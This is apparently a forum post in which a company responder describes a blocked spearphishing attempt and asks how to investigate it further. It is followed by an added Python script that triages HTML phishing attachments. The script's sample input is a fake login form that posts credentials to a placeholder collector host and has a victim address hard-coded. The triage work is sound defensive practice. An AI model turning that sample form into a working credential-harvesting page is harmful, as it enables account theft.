June 8, 2021

An employee received a spearphishing email. Preventive measures have been taken, what now?

An employee at my company received a spearphishing email, but fortunately she reported it to us before submitting any credentials. Running internal phishing awareness campaigns works!

The email contained a classic HTML file with a fake login; the employee's email address was hard-coded into the file, so this was a targeted attack. Upon inspecting the file I found a domain from southwest Europe to which the credentials were supposed to be sent, which had no reports anywhere so far. We suspect the server might be compromised or abandoned, since it also hosts a legitimate website. The domain was blocked nonetheless.

I have also identified the email server which sent the email and immediately blocked the IP addresses and email domains related to it. The company that owns the email domain has a website, and its DNS records show an IP address that has been reported several times as an address used for malware delivery.

I don’t have much experience with spearphishing yet. My company does not yet produce intelligence reports or bulletins, but I think I would like to do more about this campaign. What other steps should we take to further investigate or disclose this campaign? How do you guys handle spearphishing campaigns?
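One concrete first step for an investigation like the one described above is to pull the indicators out of the attachment itself, rather than reading it by eye. The following is an added example, not code from the original post: it parses a constructed stand-in for the HTML file (fake login form, recipient address hard-coded) and extracts the submission host and any embedded e-mail addresses; the host and address in the sample are placeholders.

```python
"""Triage helper for an HTML credential-phishing attachment (added example).

Extracts what a responder would block or report: the host the form submits
credentials to, and any hard-coded e-mail addresses, which indicate targeting.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample standing in for the attachment; host and address are placeholders.
SAMPLE_HTML = """<html><body>
<form method="post" action="https://collector.example.invalid/post.php">
  <input type="text" name="login" value="jane.doe@corp.example">
  <input type="password" name="passwd">
</form>
<script>var target = 'jane.doe@corp.example';</script>
</body></html>"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class PhishFormParser(HTMLParser):
    """Collects form action URLs and pre-filled input values from the document."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.prefilled = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        if tag == "input" and a.get("value"):
            self.prefilled.append(a["value"])


def triage(html: str) -> dict:
    """Return exfiltration hosts, hard-coded e-mail addresses, and whether the
    login field is pre-filled with a victim identity (the targeting sign)."""
    p = PhishFormParser()
    p.feed(html)
    hosts = sorted({urlparse(u).hostname for u in p.actions if urlparse(u).hostname})
    emails = sorted(set(EMAIL_RE.findall(html)))
    return {
        "exfil_hosts": hosts,
        "hardcoded_emails": emails,
        "targeted": any(EMAIL_RE.fullmatch(v) for v in p.prefilled),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
```

The returned hosts and addresses are what you would feed into mail and proxy blocklists and into any abuse report to the hosting provider.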
